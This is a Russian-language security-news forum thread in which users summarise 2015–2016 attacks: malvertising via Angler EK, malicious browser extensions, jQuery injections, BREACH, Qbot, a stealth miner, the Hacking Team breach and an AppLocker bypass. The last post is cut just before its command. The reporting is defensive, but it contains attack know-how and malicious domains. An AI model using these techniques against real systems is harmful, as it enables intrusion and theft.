1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Веб-технологии на службе у Malware и злоумышленников

Тема в разделе "Новости информационной безопасности", создана пользователем SNS-amigo, 16 июл 2015.

  1. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Технология инфицирования ПК через рекламный баннер

    Malwarebytes сообщили о вредоносной кампании с распространением набора эксплоитов Angler. В рамках данной кампании злоумышленники размещают вредоносную рекламу на популярных платформах LiveJournal.com и Likes.com. Атаки осуществляются автоматически – компьютер будет инфицирован даже в том случае, если пользователь не кликнет на вредоносный баннер. Эти сайты привлекают злоумышленников из-за большого количества посетителей — за 100 миллионов в месяц.

    Злоумышленники проводят фишинговые атаки для сбора учетных данных различных компаний. Полученная информация используется для регистрации поддомена, предназначенного для хостинга вредоносных баннеров. Для обмана бдительности пользователей, при создании рекламных объявлений преступники используют изображения и контент с сайтов компаний, предлагающих различные продукты и услуги. В результате реклама не вызывает подозрений у пользователей.

    Злоумышленники используют тактику чередования показа вредоносных и безопасных рекламных баннеров и атакуют только пользователей, на чьих устройствах установлены устаревшие версии ПО.

    Схема проведения Malvertising-атаки (текстовый вариант)
    Первая атака:
    1. Publisher (Издатель): likes.com
    2. Ad network: AppNexus (Рекламная сеть: AppNexus)
    3. Fraudulent advertiser (Рекламодатель-мошенник): crea.bouquetsandbunting.co.uk
    4. Google open redirect (Редирект через Google)
    5. Angler EK (Набор эксплойтов Angler)

    Вторая атака:
    1. Publisher: livejournal.com
    2. Ad network: AppNexus
    3. Fraudulent advertiser: apis.arthurspools.com
    4. Google open redirect
    5. Angler EK

    англер.
    Рис.1. Схема проведения Malvertising-атаки (графический вариант, реконструкция SNS-amigo)

    [​IMG] Данная операция является частью более масштабной вредоносной кампании, затрагивающей ряд популярных ресурсов. В частности, в феврале нынешнего года специалисты компании F-Secure зафиксировали вредоносную рекламную кампанию, направленную на пользователей Skype.
     
    lilia-5-0, Phoenix, Охотник и ещё 1-му нравится это.
  2. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Вредоносные расширения для веб-браузеров: Крысы в FireFox

    Чем популярнее браузер, тем больше у него дополнительных расширений, которые могут содержать как уязвимости, так и вредоносный функционал. Злоумышленники могут использовать слабые места в структуре расширений Firefox таким образом, что вредоносная активность может быть скрыта за легитимной функциональностью.

    В рамках проходившей в Сингапуре конференции Black Hat Asia профессор Северо-восточного университета в Бостоне Уильям Робертсон и доктор Бостонского университета Ахмет Баюкэйхан продемонстрировали, как злоумышленники могут проэксплуатировать известные уязвимости в популярных дополнениях для Firefox и внедрить в них вредоносный код. К примеру, киберпреступники могут создать копию легитимного расширения, добавив в него вредоносный функционал.

    Исследователи объяснили, что расширения работают с повышенными привилегиями и имеют доступ к загружаемой информации, так что злоумышленное расширение может украсть данные о просмотренных страницах, логин-пароли и другие конфиденциальные данные.

    В ходе исследования докладчики проанализировали 2000 расширений для FireFox и составили список дополнений, уязвимых к 255 эксплоитам. В него вошли NoScript (2,39 млн пользователей), Video DownloadHelper (6 млн пользователей), GreaseMonkey (1,5 млн пользователей) и другие. Для идентификации уязвимых расширений специалисты использовали разработанный ими фреймворк CrossFire. Как оказалось в ходе исследования, расширение Adblock Plus (21,7 млн пользователей) не подвержено данным уязвимостям.

    В качестве PoC-демонстрации Робертсон и Баюкэйхан загрузили тестовое вредоносное расширение ValidateThisWebsite в официальный каталог дополнений Firefox, содержащее 50 строк необфусцированного кода. Что примечательно, это расширение успешно прошло все проверки Mozilla.

    модель атаки.
    Рис.1. Модель атаки вредоносного расширения

     
    lilia-5-0, Охотник, orderman и ещё 1-му нравится это.
  3. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Использование JavaScript-библиотеки JQuery хакерами для компрометации сайтов

    Хакеры используют популярную библиотеку JQuery, чтобы внедрить вредоносный код на веб-сайтах, работающих на WordPress и Joomla.

    JQuery является популярной библиотекой JavaScript. Основная цель этой библиотеки — стереть различия между JavaScript-реализациями в различных веб-браузеров. Если вы когда-нибудь пробовали веб-кодинг, вы знаете, как утомительно написать код, который одинаково будет работать в разных браузерах.

    Поэтому такая известная библиотека привлекла внимание тех, кто захотел использовать её для других, отличных от веб-кодирования целей. Поддельные инъекции Jquery всегда были очень популярны среди хакеров. И теперь самой популярной стала атака, которая внедряет фальшивый скрипт JQuery в главную страницу веб-сайтов сайтов, работающих на платформах WordPress и Joomla. Скрипт вставляется в исходный код перед тегом </HEAD>.

    kod-421207-edited.

    После внедрения код используется для повышения SEO-ранга и раскручивания других доменов, позволяющих киберпреступникам не только распространять инфекцию дальше и увеличивать количество скомпрометированных сайтов, но и зарабатывать деньги переходом жертвы на рекламные домены или с помощью других видов мошенничества. Вредоносный код был найден в почти 70 миллионов уникальных файлов на взломанных сайтах.

     
    lilia-5-0 и Охотник нравится это.
  4. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Вредоносные расширения для веб-браузеров: Крысы в Google Chrome

    Компания Google отреагировала на многочисленные жалобы и удалила из online-каталога Chrome Web Store, вредоносную версию 3.9.8 расширения Better History, перенаправлявшую пользователей на страницы с рекламой.

    Впервые о проблеме стало известно ещё 23 марта, когда при попытках обновиться с версии Better History 3.9.7 до 3.9.8, программа стала требовать дополнительное разрешение на прочтение и изменение всех данных пользователей на посещаемых ими web-сайтах.

    Однако после обновления в 50% случаев переход по какой-либо ссылке на странице заканчивался не только отображением искомого ресурса, но и показом дополнительной страницы, содержащей различные рекламные баннеры. Данный метод позволял автору расширения не только зарабатывать деньги, но и собирать информацию о пользователях и продавать ее рекламным компаниям.

    Как выяснилось в ходе обсуждения на сайте GitHub, автор оригинального Better History, известный в Сети как roykolak, в феврале нынешнего года продал дополнение каким-то другим разработчикам. Как показал тщательный анализ, сразу после покупки новые владельцы внедрили в расширение вредоносный скрипт common.js, устанавливающий в браузер прокси-расширение для перенаправления трафика.

    По словам одного из пользователей форума Reddit, известного как Scarazer, помимо Better History, вредоносный код также содержится в следующих расширениях Google Chrome: Chrome Currency Converter, Web Timer, User-Agent Switcher, 4chan Plus и Hide My Adblocker.

     
    lilia-5-0, Охотник, orderman и ещё 1-му нравится это.
  5. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    А вот куда смотрит Сообщество Mozilla?
    Почему эти расширения до сих пор скачиваются для браузера FireFox и делают свое вредоносное дело?
     
    Охотник нравится это.
  6. Охотник
    Оффлайн

    Охотник Активный пользователь

    Сообщения:
    281
    Симпатии:
    344
    Баллы:
    73
    Видимо ждут когда жареный петух в ... клюнет. :Sarcastic:
     
    SNS-amigo нравится это.
  7. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Hacking Team лишились лицензии

    В прошлом году мы не раз рассказывали об итальянской компании Hacking Team, специализирующейся на хакерских и шпионских услугах для правительственных организаций и властьимущих разных стран мира.

    Ранее регуляторы ЕС не находили нарушений законодательства в деятельности этой компании. Ее лицензия на предоставление киберуслуг в другие страны, выданная 12 месяцев назад действовала бы до 30 апреля 2018 года, но 31 марта нынешнего года она была отозвана по решению Генерального директората по вопросам международной торговли, подконтрольного Минэкономразвития Италии.

    Итальянское издание Il Fatto Quotidiano сообщило, что это решение вызвано изменением политической обстановки в ряде стран, куда Hacking Team поставляла свое шпионское ПО. В 2015 году компания получила лицензию на продажу своих решений в 46 стран мира, включая Египет, Азербайджан, Казахстан, Узбекистан и Иракский Курдистан.

    Представители Hacking Team отказались комментировать решение об отзыве лицензии. Как пояснили в компании, не все страны из перечня в действительности являются торговыми партнерами Hacking Team.

     
    lilia-5-0 и Охотник нравится это.
  8. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    BREACH-атака помогает расшифровывать HTTPS трафик

    Как оказалось, HTTP компрессия, используемая на сайтах для уменьшения размера передаваемых данных, может стать серьезной угрозой безопасности, если сайт использует HTTPS. Эксперты по безопасности Димитрис Каракостаси Дионисис Зиндрос в целях эксперимента усовершенствовали эксплуатацию известной бреши, позволяющей ускорить расшифровку HTTPS трафика, и применить атаку против блочных шифров в SSL/TLS соединении.

    Атака, получившая название BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext), использует недочеты алгоритма сжатия gzip/DEFLATE. Впервые об этой атаке стало известно еще в 2013 году. На конференции Black Hat USA исследователи Ангело Прадо, Нил Херрис и Йоел Глюк рассказали об атаках на SSL/TLS потоковые шифры, например RC4.

    Демонстрация же нового подхода к эксплуатации реализована в фреймворке с открытым исходным кодом Rupture, представленном на конференции Black Hat Asia на прошлой неделе. Во время доклада эксперты продемонстрировали две успешные атаки на Gmail и чат Facebook.

    Для осуществления BREACH атаки злоумышленник должен иметь возможность перехвата сетевого трафика жертвы. Это может делается посредством Wi-Fi сети, или через доступ к оборудованию Интернет-провайдера. Атакующему также потребуется обнаружить уязвимую часть приложения, принимающую входные данные посредством URL параметров, и возвращающую эти данные в зашифрованном ответе.

    В случае с Gmail таким приложением оказался поиск на сайте для мобильных устройств. Если поисковый запрос делается от имени авторизованного пользователя, к ответу также присоединяется аутентификационный токен. Этот токен будет зашифрован внутри ответа. Но каждый раз, когда искомая строка будет совпадать с частью токена, размер ответа клиенту будет меньше, поскольку одинаковые строки в ответе будут сжиматься.

    Злоумышленник может заставит клиентское приложение отправить большое количество запросов и, таким образом, угадать все символы аутентификационного токена.

    Фреймворк Rupture позволяет внедрить специальный код в каждый незашифрованный HTTP запрос, открытый браузером жертвы. Внедренный код заставляет браузер клиента осуществлять подключения к уязвимому HTTPS приложению в фоновом режиме. Это требуется для проведения успешной атаки на блочные шифры, создающие много «шума» при шифровании данных. Для устранения мусора исследователи отправляли одни и те же запросы несколько раз подряд и анализировали разницу в размерах полученных ответов. Экспертам также удалось использовать параллелизацию на стороне браузера, что значительно ускорило атаку против блочных шифров в TLS подключениях.

     
    lilia-5-0, Охотник, orderman и ещё 1-му нравится это.
  9. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Adware OSX.Pirrit получает полный контроль над системой Mac OS X

    Исследователь Амит Серпер из Cybereason Labs обнаружил новый вариант рекламного ПО Pirrit, разработанного для систем под управлением OS X. Программа создает прокси-сервер на инфицированных Mac-ах и внедряет рекламные баннеры на просматриваемые пользователями web-страницы.

    Сейчас OSX.Pirrit считается угрозой низкого уровня и распространяет только рекламу, но потенциально может представлять угрозу для безопасности компьютера. Ведь технически операторы рекламного ПО имеют полный доступ к целевым системам. Вместо того, чтобы заваливать вас рекламой, они могут легко получить доступ к персональным данным и корпоративной информации или установить кейлоггер, регистрирующий нажатия клавиш при вводе логина/пароля для банковской учетной записи.

    Злоумышленники внедряют OSX.Pirrit в фальшивые обновления Adobe Flash, а также пакеты Microsoft Office 2016 и Adobe Photoshop CC. Единственным способом обнаружить присутствие рекламного ПО на системе является проверка всех работающих в OS X процессов. Амит Серпер разместил на GitHub скрипт, предназначенный для удаления этого рекламного ПО.

    По словам исследователя, OSX.Pirrit не использует эксплоиты для компрометации Mac. Инфицирование осуществляется при помощи методов социальной инженерии, обманом заставляющих пользователей предоставить свои учетные данные для загрузки фальшивого обновления, возможно для Flash. Обнаруженный Серпером образец был написан с использованием Qt Framework и подписан валидным сертификатом Apple. По мнению эксперта, автором программы является человек, владеющий навыками работы с Linux, но не особо разбирающийся в тонкостях разработки OS X.

    Для напоминания:
    Предыдущая версия Adware Pirrit изрядно потрясла ОС Windows. Настала очередь и Mac OS.

     
    lilia-5-0 и Охотник нравится это.
  10. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Технология атаки с использованием уязвимости Flash 0-day

    Эксплойты для новой бреши нулевого дня в Adobe Flash Player агрессивно раздаются через два эксплойт-пака. Сама уязвимость была пропатчена 7 апреля. Эксплуатация CVE-2016-1019 itw была зафиксирована еще до выпуска патча; злоумышленники воспользовались этой 0-day для распространения вымогателей Locky и Cerber. Включение эксплойт-пака в схему доставки криптоблокеров неново, но в случае с Locky, раздающимся преимущественно через спам, открывает дополнительную возможность для масштабирования этой вредоносной операции, которая уже охватила сферу здравоохранения.

    Новой уязвимости 0-day, связанной с путаницей типов данных, подвержены все версии Flash Player на Windows 10 и ниже. Соответствующий эксплойт, по свидетельству Proofpoint, уже добавлен в арсенал Nuclear и Magnitude; первый раздает Locky, второй мобилизован для доставки Cerber. Число потенциальных жертв могло бы исчисляться миллионами, но новый эксплойт ориентирован лишь на устаревшие версии Flash Player. Атакующие самовольно ограничили целевую аудиторию, а зачем – непонятно.

    Данный эксплойт уже пущен в ход, в составе Magnitude он начал доставлять Cerber с 3 февраля, схема Nuclear-Locky с его участием заработала 31 марта. Оба эксплойт-пака не столь популярны у киберкриминала, как Angler, но, тем не менее, вполне эффективны и пользуются стабильным спросом на черном рынке. Для распространителей Locky, ежедневно рассылающих миллионы вредоносных писем, новый Flash-эксплойт – хороший шанс повысить процент доставки.

    Те, у кого установлен Flash 21.0.0.182, вышедший 10 марта, и более новый, могут считать себя вне опасности, остальным рекомендуется незамедлительно произвести обновление. По данным Adobe, в настоящее время злоумышленники атакуют лишь Windows 7 и XP с установленным Flash версий 20.0.0.306 и ниже.


    Загрузка новых версий Adobe Flash Player 21.0.0.213
    для Windows, Firefox, Safari, Opera - NPAPI
    http://fpdownload.adobe.com/get/flashplayer/pdc/21.0.0.213/install_flash_player.exe
    для Windows, Internet Explorer - ActiveX
    http://fpdownload.adobe.com/get/flashplayer/pdc/21.0.0.213/install_flash_player_ax.exe
    для Windows, Chromium-based browsers - PPAPI
    http://fpdownload.adobe.com/get/flashplayer/pdc/21.0.0.213/install_flash_player_ppapi.exe
     
    lilia-5-0, orderman и Охотник нравится это.
  11. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Malvertising: Реклама становится опасной

    Проблема вредоносной рекламы (malvertising, произносится как "мэлвэтайзин") поднималась мною уже много раз. Например, тут.

    За последние несколько месяцев BBC, Нью-Йорк Таймс, и другие новостные и коммерческие сайты стали жертвами атаки, проводимой вредоносной рекламной кампанией (Malvertising). Почему вредоносной? Для того, чтобы понять этот тип атаки, мы должны вернуться к основам Malware (вредоносных программ).

    Одним из наиболее известных способов распространения вредоносов являются заражения веб-сайтов и атаки “drive-by-download". Когда пользователь посещает зараженный сайт, то сразу активируется набор эксплойтов (EK, Expoit Kit), который злоумышленники разместили на взломанном или специально созданном ими сайте. После активизации EK проверяет, является ли система пользователя уязвимой к одному или нескольким эксплойтам, которые есть в его наборе. Если да, то EK использует обнаруженную уязвимость для установки вредоносного ПО на устройстве пользователя. См. подробную схему в вышеупомянутой статье.

    Хакерам сегодня нет необходимости инфицировать каждый сайт, гораздо эффективнее заражать серверы, которые поставляют рекламу. Эта форма атаки называется Malvertising, и она чрезвычайно эффективна для злоумышленников с их вредоносными программами, которые хотят охватить широкую аудиторию посетителей. А чем популярнее сайт, тем и воздействие больше будет.

    Malvertising с недавних пор уже не является новой формой нападения, но она стала главной новостью в мире после нескольких недавних событий. В начале марта, была выявлена большая кампания целенаправленного Malvertising-а в рекламной платформе Baidu. Несмотря на то, что всё началось в октябре 2015 г., уклончивый и сложный характер этой вредоносной кампании позволил ей долго оставаться незамеченной и в течение более 4-х месяцев влиять на многочисленный контингент китайских пользователей.

    Две недели спустя несколько крупных новостных сайтов, в том числе BBC, New York, MSN, AOL, также пострадали от этой вредоносной кампании. Посетители этих популярных сайтов были мишенью для вымогательского ПО, схожего с известной атакой Cryptolocker, использовавшей набор эксплойтов Angler EK.

    Нежданный шквал Malvertising-атак пришелся на период уик-энда. Он ударил по некоторым крупнейшим бизнес-издателям, в их числе msn.com, nytimes.com, bbc.com, aol.com, my.xfinity.com, nfl.com, realtor.com, theweathernetwork.com, thehill.com, и newsweek.com. Атаки шли из нескольких подозрительных доменов, в их числе rackmytraffic[c.]biz и talk915[.]pw . Вредоносные объявления также были замечены на множестве других популярных сайтов, включая answers.com, zerohedge.com, infolinks.com, а также на сайтах, имеющих в названии слово "media".

    Нападавшие не остановились и после того, как кампания была обнаружена и фактически отбита. Они просто изменили тактику Malvertising-а, вернувшись к инфицированию ПК через рекламный баннер. Об этом я написал 30 марта. Вредоносная кампания успешно продолжила работу на веб-сайте Fox News и ряде других.

    В случае таких широкомасштабных атак специалисты по безопасности советуют пользователям уменьшить "поверхность атаки", т.е. выбрать один из двух вариантов защиты:
    - полностью деинсталлировать ПО Adobe Flash, Java Oracle, Microsoft Silverlight и сторонние расширения в браузерах, если не используются;
    - поддерживать ПО Adobe Flash, Java Oracle, Microsoft Silverlight в строго актуальном состоянии.

    Почему Malvertising-атаки набирают обороты?
    Как видите, хакеры сейчас чаще нападают на поставщиков рекламы, которые работают со множеством веб-сайтов, и не нападают на отдельно взятые сайты. Использование такой атаки через поставщика рекламы — это сегодня более легкий путь к успеху, чем прямые атаки на какой-то выборочный сайт. Мы показали эту модель успешной атаки на нескольких примерах распространения вредоносной рекламы. По этой причине мы считаем, что тенденция Malvertising-а в дальнейшем будет продолжаться в отношении крупных сайтов и, через них, против посетителей-пользователей по всему миру. Для того, чтобы смягчить удары от описанной атаки и уменьшить возможные последствия, серверы должны усилить собственные меры безопасности и обеспечить законность поставок своих услуг.

     
    lilia-5-0 и Охотник нравится это.
  12. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Вредонос Qbot расширяет сферу атаки

    Специалисты по безопасности BAE System впервые обнаружили улучшенную версию вредоносного ПО Qbot в начале года, когда они были приглашены в организацию, в которой вредоносные программы заразили более 500 компьютеров и разрушили работу критически важных систем. Исследование показало, то вредонос Qbot получил новое крупное обновление, которое способствовало всплеску активности в конце декабря 2015 и в начале 2016 г. В основном вредонос используется для хищения учетных данных и размещения бэкдоров на зараженных системах.

    qbot.
    Рис.1. Сектора атаки

    В настоящее время в состав ботнета входит более 54 517 тыс. инфицированных компьютеров в тысячах организаций. Большая часть из них находится в США, Великобритании и Канаде. Наибольшее число инфицированных ПК оказалось в академическом секторе (университеты и другие учебные заведения), затем идут правительственный сектор, учреждения здравоохранения, отделения полиции и коммерческий сектор.

    qbot3.
    Рис.2. Схема доставки Qbot

    Для инфицирования ПК используются вредоносные рекламные баннеры или методы социальной инженерии, когда обманом пользователей вынуждают переходить на вредоносный сайт, содержащий набор эксплоётов RIG. Доставленный в систему Qbot пытается заразить другие ПК в сети, используя для этой цели общие сетевые папки. Если они защищены паролем, вредонос пытается украсть учетные данные из Internet Explorer и получить доступ к диспетчеру учетных данных Windows. В случае неудачи троян использует список с популярными комбинациями логин/пароль, содержащимися в его базе, для осуществления брутфорс-атаки.

    После того, как Qbot заразит столько жертв, сколько есть в сети организации, он связывается C&C-сервером, от которого каждые шесть часов получает обновления. В них, помимо командных инструкций, также содержатся уникальные образцы вредоносов, сгенерированных для каждого зараженного вирусом ПК с помощью двухэтапного полиморфического процесса, что приводит к изменению структуры Qbot и позволяет ему избежать обнаружения антивирусами.

    Эксперты обнаружили, что Qbot защищает себя шифратором с довольно сложной средой выполнения, с API-интерфейсом и строками, хранящимися в шифрованных блоках, которые расшифровываются только по необходимости. Это гарантирует, что важные строки кода вредоноса не будут легко доступны, если кто-то захочет получить дампы памяти с зараженной машины. Вредонос проверяет в реестре наличие строк, связанных с виртуальными средами, чтобы избежать своего запуска в песочницах и виртуальных машинах, и затруднить исследование.

    Успешному распространению Qbot способствует тот факт, то бюджет большинства организаций общественного сектора, ответственных за работу критической инфраструктуры или сервисов, довольно ограничен. Из-за дефицита средств структуры зачастую используют устаревшее программное и аппаратное обеспечение, что увеличивает риск кибератак.

     
    Охотник, lilia-5-0, orderman и ещё 1-му нравится это.
  13. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Adware Bundlers тайно устанавливает майнеров криптовалют

    Почему тормозят пользовательские компьютеры? Причин тому много, но мы сегодня расскажем об одной из них, малоизвестной и более скрытной.

    Поставщики известного Adware Bundlers (по-русски "упаковщики", "монтажники") воспользовавшись тем, что нет закона, регулирующего их деятельность, становятся всё более жадными и агрессивными по отношению к пользовательским системам. Так, например, в числе их новых "достижений" находится приложение VNLGP Miner .

    Слово miner (читается "майнер", по-русски "шахтер", "рудокоп", "добытчик") сразу предполагает установку какого майнера, т.е. добытчика криптовалюты на компьютере ничего не подозревающей жертвы.

    При установке инсталлятор VNLGP Miner сначала проверяет возможность установки майнера. Одна из проверок ищет конкретные установленные на компьютере антивирусные программы и, если находит, то прерывает установку. Такое поведение программы заранее говорит о её какой-то тайной, например, вирусной или нелегитимной деятельности. С этим вопросом мы сейчас и разберемся.

    Список антивирусных программ из списка VNLGP Miner:
    AVG, avast!, Avira, Baidu, Dr.Web, GData, Filseclab Twister Antivirus, FortiClient, IKARUS, K7 Antivirus 7.0, Malwarebytes, McAfee, Nano, Panda, Symantec Endpoint Protection, TrendMicro, VIPRE Antivirus, VIPRE Internet Security.

    Майнеры обычно используют графическую карту, установленную в ПК, потому вторая проверка ищет совместимые графические карты. Если совместимая видеокарта не найдена, то установка прерывается.

    Если компьютер имеет высокопроизводительную видеокарту и в системе нет антивируса из списка, то инсталлятор ставит VNLGP в директорию %AppData%\VNLGP\VNLGP. Майнер прописывается в Автозагрузку системы, чтобы запускаться с Windows. При запуске он забирает 70% мощности высокопроизводительной видеокарты, что приводит к значительному потреблению электроэнергии и критическому перегреву оборудования.

    Файл конфигурации майнера определяет, как он должен работать при выполнении. Из него видно, что он подключен к майнингу, расположенному на хосте pool50.poolminers.net и логинится в системе с именем пользователя "miner" и паролем "X". Также видно, что майнер добывает криптовалюту на Decred.

    vnlgp_conf.

    Вредоносность Adware Bundlers и VNLGP Miner
    Действие такого Adware и майнера стопроцентно можно назвать вредоносным, т.к. перегрев "железа" сверх нормы может привести к физическому повреждению оборудованию жертвы, в частности к преждевременному выходу из строя видеокарты и блока питания.

    Кроме того, тот факт, что Adware устанавливает майнера на ПК жертвы без его ведома, является воровством. Так ради генерирования денежного дохода для поставщика Adware, расходуется электроэнергия пользователя-жертвы, используется ПК, купленный пользователем, критически перегревается видеокарта и, как следствие, быстрее выйдут из строя еще и блок питания, материнская плата, жесткий диск ПК жертвы.

    Вывод
    То, что деятельность компании-поставщика Adware не является легитимным, должно стать основанием для прекращения работы этой компании, использующей к тому же запутанные условия использования своего ПО, которые большинство людей не читают. Работа таких нелегитимных рекламных связок в глобальной сети носит эпидемический характер, т.к. ухудшает работу пользовательских компьютерных систем и приносит им ощутимый вред. Что-то должно измениться в поставках такого типа программного обеспечения.

    Руководство по удалению Vnlgp Miner и предотвращению его установки:
    Remove Vnlgp Miner (Removal Guide)


    + PDF-документ "Как добываются биткоины или что такое майнинг"
    Статьи на SZ
     
    Охотник, lilia-5-0, orderman и ещё 1-му нравится это.
  14. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Как взломали хакеров Hacking Team

    В прошлом году мы много раз рассказывали о технологиях, находящихся на вооружении хакерской компании Hacking Team (ссылка1, ссылка2, ссылка3, ссылка4, ссылка5), а недавно их вообще лишили лицензии. Теперь настала пора рассказать о том, как их взломали.

    Ответственность за кибератаку на HT взял на себя хакер, назвавшийся Финеасом Фишером (Phineas Fisher). На прошлой неделе после восьми месяцев затишья он опубликовал подробности о взломе Hacking Team.

    Публикация Финеаса Фишера является своеобразным политическим манифестом, объясняющим мотивы, которыми руководствовался хакер.
    «Вот все необходимое для того, чтобы закрыть компанию и пресечь нарушения прав человека. В этом заключается красота и асимметрия взлома: всего за сто часов один человек способен свести на нет годы работы многомиллионной компании. Хакинг дает униженным шанс сражаться и побеждать», - говорится в его заявлении.

    HACKED.

    По мнению Финеаса Фишера, настоящие «этические хакеры» публикуют документы, раскрывающие коррупцию и злоупотребление властью, а не консультируют и помогают компаниям, заслуживающим того, чтобы их взломали.

    Для проникновения во внутреннюю сеть Hacking Team Фишер эксплуатировал уязвимость нулевого дня. Он до сих пор остается неисправленной, потому Фишер не даёт о ней подробностей. Попав в сеть, он загрузил электронные письма и получил доступ к другим серверам. Затем хакер получил права администратора основной сети Windows и наблюдал за действиями системных администраторов, в частности за Кристианом Поцци. С помощью кейлоггера Фишеру удалось похитить пароль Поцци и с его помощью получить доступ ко всем исходным кодам Hacking Team, хранящимся в отдельной изолированной сети.

    Воспользовавшись функцией восстановления пароля, хакер сменил пароль к учетной записи компании в Twitter и 5 июля 2015 года сообщил о взломе от имени самой Hacking Team. По словам Финеаса Фишера, он провел в корпоративной сети шесть недель, а на осуществление атаки и похищение данных к него ушло сто часов.

     
    Охотник, lilia-5-0 и orderman нравится это.
  15. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Использование поддельных кнопок социальных сетей

    Злоумышленники взяли на вооружение новую технику распространения вредоносного ПО. Они размещают на скомпрометированных сайтах поддельные кнопки социальных сетей. Подобные атаки проводятся также на сайты, созданные под управлением WordPress и Joomla.

    Злоумышленники модифицируют существующие JavaScript-сценарии на сайте для сокрытия своей деятельности. Вредоносный код подключается к домену social-button.site и обращается к двум файлам analytics.js и widget.js.

    Fiddler.

    Если в HTTP Referer заголовке браузера не содержится адрес ранее инфицированной страницы, пользователь загружает «чистые» версии JavaScript-сценариев.

    clean_malicious.

    После загрузки вредоносного сценария злоумышленники используют набор эксплоитов Angler для заражения компьютера жертвы.

    angler-ek+.
    Схема распространения вредоносного ПО (реконструкция SNS-amigo)

    Название сайта social-button.site призвано обмануть пользователей названием, якобы относящимся к плагинам и виджетам для социальных сетей.

    Код (Text):
    Домен: social-button.site
    Регистратор: Namecheap INC
    E-mail: b81089942b384e87b51d86fdf05c5bc7.protect@whoisguard.com
    Страна: Panama
    Дата создания: 2016-04-13T19: 39: 57
     
    lilia-5-0, Охотник, orderman и ещё 1-му нравится это.
  16. Охотник
    Оффлайн

    Охотник Активный пользователь

    Сообщения:
    281
    Симпатии:
    344
    Баллы:
    73
    Неизвестные установили в Facebook бэкдор и перехватывали данные пользователей

    Исследователь по безопасности компании DevCore Оранж Цай в целях поиска проблем безопасности в системе Facebook взломал один из серверов Facebook и обнаружил бэкдор для сбора учетных записей сотрудников соцсети, оставленный неизвестным злоумышленником. Цай участвовал в программе финансового вознаграждения за найденные уязвимости, запущенной компанией Facebook.

    Используя технику reverse whois, Цай обнаружил интересный домен tfbnw.net, предполагая, что имеет дело с "The Facebook Network". Потом оказалось, что у домен есть поддомен vpn.tfbnw.net, исследование которого выявилое ряд интересных серверов, в частности files.fb.com.

    Данный домен используется сотрудниками соцсети как хостинг для файлов и работает под управлением Accellion Secure File Transfer (FTA). Идентифицировав ПО и его версию, исследователь обнаружил 7 ошибок: 3 XSS-уязвимости, 2 уязвимости, приводящие к локальному повышению привилегий, проблему с секретным ключом, позволяющую удаленное выполнение кода, и Pre-Auth SQL-инъекцию, также позволяющую удаленно выполнить произвольный код. Эксплуатация последней позволила специалисту получить доступ к серверу и получить над ним контроль.

    В ходе дальнейшего исследования Цай заметил несколько странных сообщений об ошибках в логах /var/opt/apache/php_error_log. Изучив сообщения, эксперт обнаружил непонятную web-оболочку, оставленную предыдущим «посетителем». Как выяснилось, бэкдор использовался для перехвата учетных данных сотрудников Facebook и сохранения логинов и паролей в локальный файл. Модифицированный файл служил в качестве прокси для сбора GET- и POST-запросов, а также значения COOKIE.

    В период с 1 по 7 февраля 2016 года было перехвачено порядка 300 учетных записей пользователей @fb.com и @facebook.com. Как показал анализ логов, злоумышленник дважды проникал в систему – и июле и середине сентября 2015 года. Цай сообщил об обнаруженной проблеме в службу технической поддержки Facebook. В качестве вознаграждения за проделанную работу специалист получил премию в размере $10 тыс.

     
    lilia-5-0 и SNS-amigo нравится это.
  17. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.911
    Баллы:
    643
    Технология обхода Windows AppLocker

    Обнаружен способ обхода средства безопасности Windows AppLocker, который не требует привилегий администратора. Для осуществления атаки нужна лишь короткая команда, код которой уместится в один твит.

    Windows AppLocker позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь. Например, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника. За время сущестования функции AppLocker уже администраторы привыкли её доверять AppLocker. Однако теперь оказывается, что обойти ограничения можно довольно легко.

    Независимый исследователь Кейси Смит предложил использовать Regsvr32 не по назначению и с его помощью скачать из интернета определенный файл. Для этого он использовал следующую команду:
    Код (Text):
